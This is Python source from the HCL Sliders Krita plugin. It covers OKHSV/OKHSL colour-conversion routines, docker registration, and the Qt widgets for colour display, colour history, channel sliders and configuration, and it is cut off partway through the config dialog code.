scaleL = (1 / max(rgbScale[0], rgbScale[1], rgbScale[2])) ** (1 / 3)
l = Convert.toe(l / scaleL)
            # we can now compute v and s:
v = l / l_v
s = (s0 + tMax) * c_v / ((tMax * s0) + tMax * k * c_v)
if s > 1:
s = 1.0
return (round(h, 2), round(s * 100, 2), round(v * 100, 2))
@staticmethod
def okhsvToRgbF(h: float, s: float, v: float, trc: str):
# scale saturation and value range from 0-100 to 0-1
s /= 100
v /= 100
rgb = None
if v == 0:
return (0, 0, 0)
elif s == 0:
rgb = Convert.oklabToLinear(Convert.toeInv(v), 0, 0)
else:
ab = Convert.polarToCartesian(1, h)
cuspLC = Convert.findCuspLC(*ab)
st = Convert.cuspToST(cuspLC)
sMax = st[0]
tMax = st[1]
s0 = 0.5
k = 1 - s0 / sMax
# first we compute L and V as if the gamut is a perfect triangle:
# L, C when v==1:
l_v = 1 - s * s0 / (s0 + tMax - tMax * k * s)
c_v = s * tMax * s0 / (s0 + tMax - tMax * k * s)
l = v * l_v
c = v * c_v
# then we compensate for both toe and the curved top part of the triangle:
l_vt = Convert.toeInv(l_v)
c_vt = c_v * l_vt / l_v
l_new = Convert.toeInv(l)
c *= l_new / l
l = l_new
rgbScale = Convert.oklabToLinear(l_vt, ab[0] * c_vt, ab[1] * c_vt)
scaleL = (1 / max(rgbScale[0], rgbScale[1], rgbScale[2])) ** (1 / 3)
l *= scaleL
c *= scaleL
rgb = Convert.oklabToLinear(l, ab[0] * c, ab[1] * c)
# perform transfer functions for components if output to sRGB
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
@staticmethod
def rgbFToOkhsl(r: float, g: float, b: float, trc: str):
# if rgb not linear, convert to linear for oklab conversion
if trc == "sRGB":
r = Convert.componentToLinear(r)
g = Convert.componentToLinear(g)
b = Convert.componentToLinear(b)
oklab = Convert.linearToOklab(r, g, b)
l = oklab[0]
ch = Convert.cartesianToPolar(oklab[1], oklab[2])
s = 0
c = ch[0]
# chroma of neutral colors will not be exactly 0 due to floating point errors
if c >= 0.000001:
a_ = oklab[1] / c
b_ = oklab[2] / c
cs = Convert.getCs(l, a_, b_)
c0 = cs[0]
cMid = cs[1]
cMax = cs[2]
# Inverse of the interpolation in okhsl_to_srgb:
mid = 0.8
midInv = 1.25
if c < cMid:
k1 = mid * c0
k2 = 1 - k1 / cMid
t = c / (k1 + k2 * c)
s = t * mid
else:
k1 = (1 - mid) * cMid * cMid * midInv * midInv / c0
k2 = 1 - k1 / (cMax - cMid)
t = (c - cMid) / (k1 + k2 * (c - cMid))
s = mid + (1 - mid) * t
# gamut intersection jumps for parts of blue
h = ch[1] if not 264.052 < ch[1] < 264.06 else 264.06
l = Convert.toe(l)
return (round(h, 2), round(s * 100, 2), round(l * 100, 2))
@staticmethod
def okhslToRgbF(h: float, s: float, l: float, trc: str):
# scale saturation and lightness range from 0-100 to 0-1
s /= 100
l /= 100
if l == 0 or l == 1:
return (l, l, l)
ab = Convert.polarToCartesian(1, h)
l = Convert.toeInv(l)
c = 0
if s:
cs = Convert.getCs(l, *ab)
c0 = cs[0]
cMid = cs[1]
cMax = cs[2]
# Interpolate the three values for C so that:
# At s=0: dC/ds = C_0, C=0
# At s=0.8: C=C_mid
# At s=1.0: C=C_max
mid = 0.8
midInv = 1.25
if s < mid:
t = midInv * s
k1 = mid * c0
k2 = 1 - k1 / cMid
c = t * k1 / (1 - k2 * t)
else:
t = (s - mid) / (1 - mid)
k1 = (1 - mid) * cMid * cMid * midInv * midInv / c0
k2 = 1 - k1 / (cMax - cMid)
c = cMid + t * k1 / (1 - k2 * t)
rgb = Convert.oklabToLinear(l, ab[0] * c, ab[1] * c)
# perform transfer functions for components if output to sRGB
r = Convert.componentToSRGB(rgb[0]) if trc == "sRGB" else rgb[0]
g = Convert.componentToSRGB(rgb[1]) if trc == "sRGB" else rgb[1]
b = Convert.componentToSRGB(rgb[2]) if trc == "sRGB" else rgb[2]
return (Convert.clampF(r), Convert.clampF(g), Convert.clampF(b))
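# Minimal self-check sketch for running this module directly outside Krita;
# the sample color below is arbitrary and the plugin never executes this block.
if __name__ == "__main__":
    srgb = (1.0, 0.5, 0.0)
    hsl = Convert.rgbFToOkhsl(*srgb, "sRGB")
    print("okhsl:", hsl)
    print("back to sRGB:", Convert.okhslToRgbF(*hsl, "sRGB"))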
| 39,439 | Python | .py | 923 | 32.548212 | 99 | 0.526123 | lucifer9683/HCLSliders | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,181 | __init__.py | lucifer9683_HCLSliders/hclsliders/__init__.py | # SPDX-License-Identifier: GPL-3.0-or-later
#
# HCL Sliders is a Krita plugin for color selection.
# Copyright (C) 2024 Lucifer <krita-artists.org/u/Lucifer>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from krita import Krita, DockWidgetFactory, DockWidgetFactoryBase
from .hclsliders import HCLSliders
DOCKER_ID = 'pykrita_hclsliders'
instance = Krita.instance()
dock_widget_factory = DockWidgetFactory(DOCKER_ID,
DockWidgetFactoryBase.DockRight,
HCLSliders)
instance.addDockWidgetFactory(dock_widget_factory)
| 1,181 | Python | .py | 25 | 42.88 | 72 | 0.746528 | lucifer9683/HCLSliders | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,182 | hclsliders.py | lucifer9683_HCLSliders/hclsliders/hclsliders.py | # SPDX-License-Identifier: GPL-3.0-or-later
#
# HCL Sliders is a Krita plugin for color selection.
# Copyright (C) 2024 Lucifer <krita-artists.org/u/Lucifer>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Pigment.O is a Krita plugin and it is a Color Picker and Color Mixer.
# Copyright ( C ) 2020 Ricardo Jeremias.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# ( at your option ) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt5.QtCore import Qt, pyqtSignal, QTimer, QSize
from PyQt5.QtGui import QPainter, QBrush, QColor, QLinearGradient, QPixmap, QIcon
from PyQt5.QtWidgets import (QWidget, QVBoxLayout, QHBoxLayout, QDoubleSpinBox, QLabel, QLineEdit,
QPushButton, QListWidget, QListWidgetItem, QDialog, QStackedWidget,
QTabWidget, QCheckBox, QGroupBox, QRadioButton, QSpinBox)
from krita import DockWidget, ManagedColor
from .colorconversion import Convert
DOCKER_NAME = 'HCL Sliders'
# adjust plugin sizes and update timing here
TIME = 100 # ms time for plugin to update color from krita, faster updates may make krita slower
DELAY = 300 # ms delay updating color history to prevent flooding when using the color picker
DISPLAY_HEIGHT = 25 # px for color display panel at the top
CHANNEL_HEIGHT = 19 # px for channels, also influences hex/ok syntax box and buttons
MODEL_SPACING = 6 # px for spacing between color models
HISTORY_HEIGHT = 16 # px for color history and area of each color box
VALUES_WIDTH = 63 # px for spinboxes containing channel values
LABEL_WIDTH = 11 # px for spacing of channel indicator/letter
# adjust various sizes of config menu
CONFIG_SIZE = (468, 230) # (width in px, height in px) size for config window
SIDEBAR_WIDTH = 76 # px for sidebar containing channel selection and others button
GROUPBOX_HEIGHT = 64 # px for groupboxes of cursor snapping, chroma mode and color history
SPINBOX_WIDTH = 72 # px for spinboxes of interval, displacement and memory
OTHERS_HEIGHT = 12 # px for spacing before color history in others page
# compatible color profiles in krita
SRGB = ('sRGB-elle-V2-srgbtrc.icc', 'sRGB built-in',
'Gray-D50-elle-V2-srgbtrc.icc', 'Gray-D50-elle-V4-srgbtrc.icc')
LINEAR = ('sRGB-elle-V2-g10.icc', 'krita-2.5, lcms sRGB built-in with linear gamma TRC',
'Gray-D50-elle-V2-g10.icc', 'Gray-D50-elle-V4-g10.icc')
NOTATION = ('HEX', 'OKLAB', 'OKLCH')
class ColorDisplay(QWidget):
def __init__(self, parent):
super().__init__(parent)
self.hcl = parent
self.current = None
self.recent = None
self.foreground = None
self.background = None
self.temp = None
self.bgMode = False
self.switchToolTip()
def setCurrentColor(self, color=None):
self.current = color
self.update()
def setForeGroundColor(self, color=None):
self.foreground = color
self.update()
def setBackGroundColor(self, color=None):
self.background = color
self.update()
def setTempColor(self, color=None):
self.temp = color
self.update()
def resetColors(self):
self.current = None
self.recent = None
self.foreground = None
self.background = None
self.temp = None
self.update()
def isChanged(self):
if self.current is None:
return True
if self.bgMode:
if self.current.components() != self.background.components():
return True
if self.current.colorModel() != self.background.colorModel():
return True
if self.current.colorDepth() != self.background.colorDepth():
return True
if self.current.colorProfile() != self.background.colorProfile():
return True
else:
if self.current.components() != self.foreground.components():
return True
if self.current.colorModel() != self.foreground.colorModel():
return True
if self.current.colorDepth() != self.foreground.colorDepth():
return True
if self.current.colorProfile() != self.foreground.colorProfile():
return True
return False
def isChanging(self):
if self.recent is None:
return False
if self.recent.components() != self.current.components():
return True
if self.recent.colorModel() != self.current.colorModel():
return True
if self.recent.colorDepth() != self.current.colorDepth():
return True
if self.recent.colorProfile() != self.current.colorProfile():
return True
return False
def switchToolTip(self):
if self.bgMode:
self.setToolTip("Background Color")
else:
self.setToolTip("Foreground Color")
def switchMode(self):
self.bgMode = not self.bgMode
self.switchToolTip()
self.update()
def mousePressEvent(self, event):
self.setFocus()
self.switchMode()
def paintEvent(self, event):
painter = QPainter(self)
painter.setPen(Qt.PenStyle.NoPen)
width = self.width()
halfwidth = round(width / 2.0)
height = self.height()
# foreground/background color from krita
if self.foreground and not self.bgMode:
painter.setBrush(QBrush(self.foreground.colorForCanvas(self.hcl.canvas())))
elif self.background and self.bgMode:
painter.setBrush(QBrush(self.background.colorForCanvas(self.hcl.canvas())))
else:
painter.setBrush( QBrush(QColor(0, 0, 0)))
painter.drawRect(0, 0, width, height)
# current color from sliders
if self.current:
painter.setBrush(QBrush(self.current.colorForCanvas(self.hcl.canvas())))
if self.bgMode:
painter.drawRect(halfwidth, 0, width - halfwidth, height)
else:
painter.drawRect(0, 0, halfwidth, height)
# indicator for picking past color in other mode
if self.temp:
painter.setBrush(QBrush(self.temp.colorForCanvas(self.hcl.canvas())))
if self.bgMode:
painter.drawRect(0, 0, halfwidth, height)
else:
painter.drawRect(halfwidth, 0, width - halfwidth, height)
class ColorHistory(QListWidget):
def __init__(self, hcl, parent=None):
super().__init__(parent)
# should not pass in hcl as parent if it can be hidden
self.hcl = hcl
self.index = -1
self.modifier = None
self.start = 0
self.position = 0
self.setFlow(QListWidget.Flow.LeftToRight)
self.setFixedHeight(HISTORY_HEIGHT)
self.setViewportMargins(-2, 0, 0, 0)
# grid width + 2 to make gaps between swatches
self.setGridSize(QSize(HISTORY_HEIGHT + 2, HISTORY_HEIGHT))
self.setUniformItemSizes(True)
self.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)
self.setHorizontalScrollMode(QListWidget.ScrollMode.ScrollPerPixel)
self.setSelectionMode(QListWidget.SelectionMode.NoSelection)
def startScrollShift(self, event):
self.start = self.horizontalScrollBar().value()
self.position = event.x()
def keyPressEvent(self, event):
# disable keyboard interactions
pass
def mousePressEvent(self, event):
self.hcl.setPressed(True)
item = self.itemAt(event.pos())
index = self.row(item)
if index != -1:
if (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.NoModifier):
color = self.hcl.makeManagedColor(*self.hcl.pastColors[index])
if color:
if self.hcl.color.bgMode:
self.hcl.color.setTempColor(color)
else:
self.hcl.color.setCurrentColor(color)
self.index = index
self.modifier = Qt.KeyboardModifier.NoModifier
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ControlModifier):
color = self.hcl.makeManagedColor(*self.hcl.pastColors[index])
if color:
if self.hcl.color.bgMode:
self.hcl.color.setCurrentColor(color)
else:
self.hcl.color.setTempColor(color)
self.index = index
self.modifier = Qt.KeyboardModifier.ControlModifier
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.AltModifier):
self.index = index
self.modifier = Qt.KeyboardModifier.AltModifier
self.startScrollShift(event)
def mouseMoveEvent(self, event):
if (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ShiftModifier):
position = 0
bar = self.horizontalScrollBar()
if bar.maximum():
# speed of grid width squared seems good
speed = (HISTORY_HEIGHT + 2) ** 2
# move bar at constant speed
shift = float(self.position - event.x()) / self.width()
position = round(self.start + shift * speed)
bar.setValue(position)
else:
self.startScrollShift(event)
def mouseReleaseEvent(self, event):
item = self.itemAt(event.pos())
index = self.row(item)
if index == self.index and index != -1:
if (event.modifiers() == Qt.KeyboardModifier.NoModifier and
self.modifier == Qt.KeyboardModifier.NoModifier):
self.hcl.setPastColor(index)
elif (event.modifiers() == Qt.KeyboardModifier.ControlModifier and
self.modifier == Qt.KeyboardModifier.ControlModifier):
self.hcl.setPastColor(index, False)
if (event.modifiers() == Qt.KeyboardModifier.AltModifier and
self.modifier == Qt.KeyboardModifier.AltModifier):
            if self.index != -1 and index != -1:
start = index
stop = self.index
if self.index > index:
start = self.index
stop = index
for i in range(start, stop - 1, -1):
self.takeItem(i)
self.hcl.pastColors.pop(i)
if self.modifier == Qt.KeyboardModifier.NoModifier and self.index != -1:
if self.hcl.color.bgMode:
self.hcl.color.setTempColor()
else:
# prevent setHistory when krita fg color not changed
self.hcl.color.current = self.hcl.color.foreground
elif self.modifier == Qt.KeyboardModifier.ControlModifier and self.index != -1:
if self.hcl.color.bgMode:
# prevent setHistory when krita bg color not changed
self.hcl.color.current = self.hcl.color.background
else:
self.hcl.color.setTempColor()
self.modifier = None
self.index = -1
self.hcl.setPressed(False)
class ChannelSlider(QWidget):
valueChanged = pyqtSignal(float)
mousePressed = pyqtSignal(bool)
def __init__(self, limit: float, parent=None):
super().__init__(parent)
self.value = 0.0
self.limit = limit
self.interval = 0.1
self.displacement = 0
self.start = 0.0
self.position = 0
self.shift = 0.1
self.colors = []
def setGradientColors(self, colors: list):
if self.colors:
self.colors = []
for rgb in colors:
# using rgbF as is may result in black as colors are out of gamut
color = QColor(*rgb)
self.colors.append(color)
self.update()
def setValue(self, value: float):
self.value = value
self.update()
def setLimit(self, value: float):
self.limit = value
self.update()
def setInterval(self, interval: float):
limit = 100.0 if self.limit < 360 else 360.0
if interval < 0.1:
interval = 0.1
elif interval > limit:
interval = limit
self.interval = interval
def setDisplacement(self, displacement: float):
limit = 99.9 if self.limit < 360 else 359.9
if displacement < 0:
displacement = 0
elif displacement > limit:
displacement = limit
self.displacement = displacement
def emitValueChanged(self, event):
position = event.x()
width = self.width()
if position > width:
position = width
elif position < 0:
position = 0.0
self.value = round((position / width) * self.limit, 3)
self.valueChanged.emit(self.value)
self.mousePressed.emit(True)
def emitValueSnapped(self, event):
position = event.x()
width = self.width()
if position > width:
position = width
elif position < 0:
position = 0.0
value = round((position / width) * self.limit, 3)
if value != 0 and value != self.limit:
interval = self.interval if self.interval != 0 else self.limit
if self.limit < 100:
interval = (self.interval / 100) * self.limit
displacement = (value - self.displacement) % interval
if displacement < interval / 2:
value -= displacement
else:
value += interval - displacement
if value > self.limit:
value = self.limit
elif value < 0:
value = 0.0
self.value = value
self.valueChanged.emit(self.value)
self.mousePressed.emit(True)
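    # Snapping illustration: on a hue slider (limit 360) with interval 30 and
    # displacement 0, a click landing on 47.2 is pulled up to 60.0, because
    # (47.2 - 0) % 30 = 17.2 is at least half the interval, so 30 - 17.2 is added.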
def startValueShift(self, event):
self.start = self.value
self.position = event.x()
def emitValueShifted(self, event):
position = event.x()
vector = position - self.position
value = self.start + (vector * self.shift)
if value < 0:
if self.limit == 360:
value += self.limit
else:
value = 0
elif value > self.limit:
if self.limit == 360:
value -= self.limit
else:
value = self.limit
self.value = value
self.valueChanged.emit(self.value)
self.mousePressed.emit(True)
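    # Drag illustration: Shift-dragging 50 px from the press point changes the value
    # by 50 * 0.1 = 5.0 units, while Alt-dragging uses the finer 0.01 step, so the
    # same distance moves it by only 0.5.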
def mousePressEvent(self, event):
if (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.NoModifier):
self.emitValueChanged(event)
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ControlModifier):
self.emitValueSnapped(event)
self.startValueShift(event)
self.update()
def mouseMoveEvent(self, event):
if (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.NoModifier):
self.emitValueChanged(event)
self.startValueShift(event)
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ControlModifier):
self.emitValueSnapped(event)
self.startValueShift(event)
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.ShiftModifier):
self.shift = 0.1
self.emitValueShifted(event)
elif (event.buttons() == Qt.MouseButton.LeftButton and
event.modifiers() == Qt.KeyboardModifier.AltModifier):
self.shift = 0.01
self.emitValueShifted(event)
self.update()
def mouseReleaseEvent(self, event):
self.mousePressed.emit(False)
def paintEvent(self, event):
painter = QPainter(self)
width = self.width()
height = self.height()
# background
painter.setPen(Qt.PenStyle.NoPen)
painter.setBrush( QBrush(QColor(0, 0, 0, 50)))
painter.drawRect(0, 1, width, height - 2)
# gradient
gradient = QLinearGradient(0, 0, width, 0)
if self.colors:
for index, color in enumerate(self.colors):
gradient.setColorAt(index / (len(self.colors) - 1), color)
painter.setBrush(QBrush(gradient))
painter.drawRect(1, 2, width - 2, height - 4)
# cursor
if self.limit:
position = round((self.value / self.limit) * (width - 2))
painter.setBrush( QBrush(QColor(0, 0, 0, 100)))
painter.drawRect(position - 2, 0, 6, height)
painter.setBrush(QBrush(QColor(255, 255, 255, 200)))
painter.drawRect(position, 1, 2, height - 2)
class ColorChannel:
channelList = None
def __init__(self, name: str, parent):
self.name = name
self.update = parent.updateChannels
self.refresh = parent.updateChannelGradients
wrap = False
interval = 10.0
displacement = 0.0
self.scale = True
self.clip = 0.0
self.colorful = False
self.luma = False
self.limit = 100.0
if self.name[-3:] == "Hue":
wrap = True
interval = 30.0
if self.name[:2] == "ok":
interval = 40.0
displacement = 25.0
self.limit = 360.0
elif self.name[-6:] == "Chroma":
self.limit = 0.0
self.layout = QHBoxLayout()
self.layout.setSpacing(2)
if self.name[:2] == "ok":
tip = f"{self.name[:5].upper()} {self.name[5:]}"
letter = self.name[5:6]
else:
tip = f"{self.name[:3].upper()} {self.name[3:]}"
if self.name[-4:] == "Luma":
letter = "Y"
else:
letter = self.name[3:4]
self.label = QLabel(letter)
self.label.setFixedHeight(CHANNEL_HEIGHT - 1)
self.label.setFixedWidth(LABEL_WIDTH)
self.label.setAlignment(Qt.AlignmentFlag.AlignCenter)
self.label.setToolTip(tip)
self.slider = ChannelSlider(self.limit)
self.slider.setFixedHeight(CHANNEL_HEIGHT)
self.slider.setMinimumWidth(100)
self.slider.setInterval(interval)
self.slider.setDisplacement(displacement)
self.slider.mousePressed.connect(parent.setPressed)
self.spinBox = QDoubleSpinBox()
if self.name[-6:] == "Chroma":
self.spinBox.setDecimals(3)
self.spinBox.setMaximum(self.limit)
self.spinBox.setWrapping(wrap)
self.spinBox.setFixedHeight(CHANNEL_HEIGHT)
self.spinBox.setFixedWidth(VALUES_WIDTH)
self.spinBox.editingFinished.connect(parent.finishEditing)
self.slider.valueChanged.connect(self.updateSpinBox)
self.spinBox.valueChanged.connect(self.updateSlider)
ColorChannel.updateList(name)
def value(self):
return self.spinBox.value()
def setValue(self, value: float):
if self.name[-6:] == "Chroma" and self.limit >= 10:
value = round(value, 2)
self.slider.setValue(value)
self.spinBox.setValue(value)
def setLimit(self, value: float):
decimal = 2 if value >= 10 else 3
self.limit = round(value, decimal)
self.slider.setLimit(self.limit)
self.spinBox.setDecimals(decimal)
self.spinBox.setMaximum(self.limit)
self.spinBox.setSingleStep(self.limit / 100)
def clipChroma(self, clip: bool):
# do not set chroma channel itself to clip as the clip value will not be updated when adjusting
self.scale = not clip
self.refresh()
def colorfulHue(self, colorful: bool):
self.colorful = colorful
self.refresh()
def updateSlider(self, value: float):
self.update(value, self.name, "slider")
def updateSpinBox(self, value: float):
self.update(value, self.name, "spinBox")
def updateGradientColors(self, firstConst: float, lastConst: float, trc: str, ChromaLimit: float=-1):
colors = []
if self.name[-3:] == "Hue":
if self.name[:2] == "ok":
# oklab hue needs more points for qcolor to blend more accurately
# range of 0 to 25 - 345 in 15deg increments to 360
points = 26
increment = self.limit / (points - 2)
displacement = increment - 25
if self.colorful:
for number in range(points):
hue = (number - 1) * increment - displacement
if hue < 0:
hue = 0
elif hue > self.limit:
hue = self.limit
rgb = Convert.okhsvToRgbF(hue, 100.0, 100.0, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhcl":
for number in range(points):
hue = (number - 1) * increment - displacement
if hue < 0:
hue = 0
elif hue > self.limit:
hue = self.limit
rgb = Convert.okhclToRgbF(hue, firstConst, lastConst, ChromaLimit, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhsv":
for number in range(points):
hue = (number - 1) * increment - displacement
if hue < 0:
hue = 0
elif hue > self.limit:
hue = self.limit
rgb = Convert.okhsvToRgbF(hue, firstConst, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhsl":
for number in range(points):
hue = (number - 1) * increment - displacement
if hue < 0:
hue = 0
elif hue > self.limit:
hue = self.limit
rgb = Convert.okhslToRgbF(hue, firstConst, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
else:
# range of 0 to 360deg incrementing by 30deg
points = 13
increment = self.limit / (points - 1)
if self.colorful:
if self.name[:3] != "hcy":
for number in range(points):
rgb = Convert.hsvToRgbF(number * increment, 100.0, 100.0, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
else:
for number in range(points):
rgb = Convert.hcyToRgbF(number * increment, 100.0, -1, -1, trc, self.luma)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hsv":
for number in range(points):
rgb = Convert.hsvToRgbF(number * increment, firstConst, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hsl":
for number in range(points):
rgb = Convert.hslToRgbF(number * increment, firstConst, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hcy":
for number in range(points):
rgb = Convert.hcyToRgbF(number * increment, firstConst, lastConst,
ChromaLimit, trc, self.luma)
colors.append(Convert.rgbFToInt8(*rgb, trc))
else:
# range of 0 to 100% incrementing by 10%
points = 11
increment = self.limit / (points - 1)
if self.name[:3] == "hsv":
if self.name[3:] == "Saturation":
for number in range(points):
rgb = Convert.hsvToRgbF(firstConst, number * increment, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[3:] == "Value":
for number in range(points):
rgb = Convert.hsvToRgbF(firstConst, lastConst, number * increment, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hsl":
if self.name[3:] == "Saturation":
for number in range(points):
rgb = Convert.hslToRgbF(firstConst, number * increment, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[3:] == "Lightness":
for number in range(points):
rgb = Convert.hslToRgbF(firstConst, lastConst, number * increment, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:3] == "hcy":
if self.name[3:] == "Chroma":
for number in range(points):
rgb = Convert.hcyToRgbF(firstConst, number * increment, lastConst,
ChromaLimit, trc, self.luma)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[3:] == "Luma":
for number in range(points):
rgb = Convert.hcyToRgbF(firstConst, lastConst, number * increment,
ChromaLimit, trc, self.luma)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhcl":
if self.name[5:] == "Chroma":
for number in range(points):
rgb = Convert.okhclToRgbF(firstConst, number * increment, lastConst,
ChromaLimit, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[5:] == "Lightness":
for number in range(points):
rgb = Convert.okhclToRgbF(firstConst, lastConst, number * increment,
ChromaLimit, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhsv":
if self.name[5:] == "Saturation":
for number in range(points):
rgb = Convert.okhsvToRgbF(firstConst, number * increment, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[5:] == "Value":
for number in range(points):
rgb = Convert.okhsvToRgbF(firstConst, lastConst, number * increment, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhsl":
if self.name[5:] == "Saturation":
for number in range(points):
rgb = Convert.okhslToRgbF(firstConst, number * increment, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[5:] == "Lightness":
for number in range(points):
rgb = Convert.okhslToRgbF(firstConst, lastConst, number * increment, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
self.slider.setGradientColors(colors)
def blockSignals(self, block: bool):
self.slider.blockSignals(block)
self.spinBox.blockSignals(block)
@classmethod
def updateList(cls, name: str):
if cls.channelList is None:
cls.channelList = []
cls.channelList.append(name)
@classmethod
def getList(cls):
return cls.channelList.copy()
class SliderConfig(QDialog):
def __init__(self, parent):
super().__init__(parent)
self.hcl = parent
self.setWindowTitle("Configure HCL Sliders")
self.setFixedSize(*CONFIG_SIZE)
self.mainLayout = QHBoxLayout(self)
self.loadPages()
def loadPages(self):
self.pageList = QListWidget()
self.pageList.setFixedWidth(SIDEBAR_WIDTH)
self.pageList.setDragEnabled(True)
self.pageList.viewport().setAcceptDrops(True)
self.pageList.setDropIndicatorShown(True)
self.pageList.setDragDropMode(QListWidget.DragDropMode.InternalMove)
self.pages = QStackedWidget()
hidden = ColorChannel.getList()
self.models = {}
for name in self.hcl.displayOrder:
if name[:2] == "ok":
self.models.setdefault(name[:5].upper(), []).append(name)
else:
self.models.setdefault(name[:3].upper(), []).append(name)
hidden.remove(name)
visible = list(self.models.keys())
for name in hidden:
if name[:2] == "ok":
self.models.setdefault(name[:5].upper(), []).append(name)
else:
self.models.setdefault(name[:3].upper(), []).append(name)
self.checkBoxes = {}
for model, channels in self.models.items():
tabs = QTabWidget()
tabs.setMovable(True)
for name in channels:
tab = QWidget()
tabLayout = QVBoxLayout()
tabLayout.setAlignment(Qt.AlignmentFlag.AlignTop)
tab.setLayout(tabLayout)
channel: ColorChannel = getattr(self.hcl, name)
snapGroup = QGroupBox("Cursor Snapping")
snapGroup.setFixedHeight(GROUPBOX_HEIGHT)
snapGroup.setToolTip("Ctrl + Click to snap cursor at intervals")
snapLayout = QHBoxLayout()
interval = QDoubleSpinBox()
interval.setFixedWidth(SPINBOX_WIDTH)
interval.setDecimals(1)
interval.setMinimum(0.1)
snapLayout.addWidget(interval)
intervalLabel = QLabel("Interval")
intervalLabel.setToolTip("Sets the snap interval to amount")
snapLayout.addWidget(intervalLabel)
displacement = QDoubleSpinBox()
displacement.setFixedWidth(SPINBOX_WIDTH)
displacement.setDecimals(1)
snapLayout.addWidget(displacement)
DisplacementLabel = QLabel("Displacement")
DisplacementLabel.setToolTip("Displaces the snap positions by amount")
snapLayout.addWidget(DisplacementLabel)
snapGroup.setLayout(snapLayout)
tabLayout.addWidget(snapGroup)
param = name[len(model):]
if (model == 'HCY' or model == 'OKHCL') and param != 'Chroma':
radioGroup = QGroupBox("Chroma Mode")
radioGroup.setFixedHeight(GROUPBOX_HEIGHT)
                    radioGroup.setToolTip("Switches how chroma is adjusted "
                                          "to stay within the sRGB gamut")
radioLayout = QHBoxLayout()
clip = QRadioButton("Clip")
clip.setToolTip("Clips chroma if it exceeds the srgb gamut when adjusting")
radioLayout.addWidget(clip)
scale = QRadioButton("Scale")
scale.setToolTip("Scales chroma to maintain constant saturation when adjusting")
radioLayout.addWidget(scale)
if channel.scale:
scale.setChecked(True)
else:
clip.setChecked(True)
clip.toggled.connect(channel.clipChroma)
radioGroup.setLayout(radioLayout)
tabLayout.addWidget(radioGroup)
if model == 'HCY' and param == 'Luma':
luma = QCheckBox("Always Luma")
luma.setToolTip("Transfer components to sRGB in linear TRCs")
luma.setChecked(channel.luma)
luma.toggled.connect(self.hcl.setLuma)
tabLayout.addWidget(luma)
if param == 'Hue':
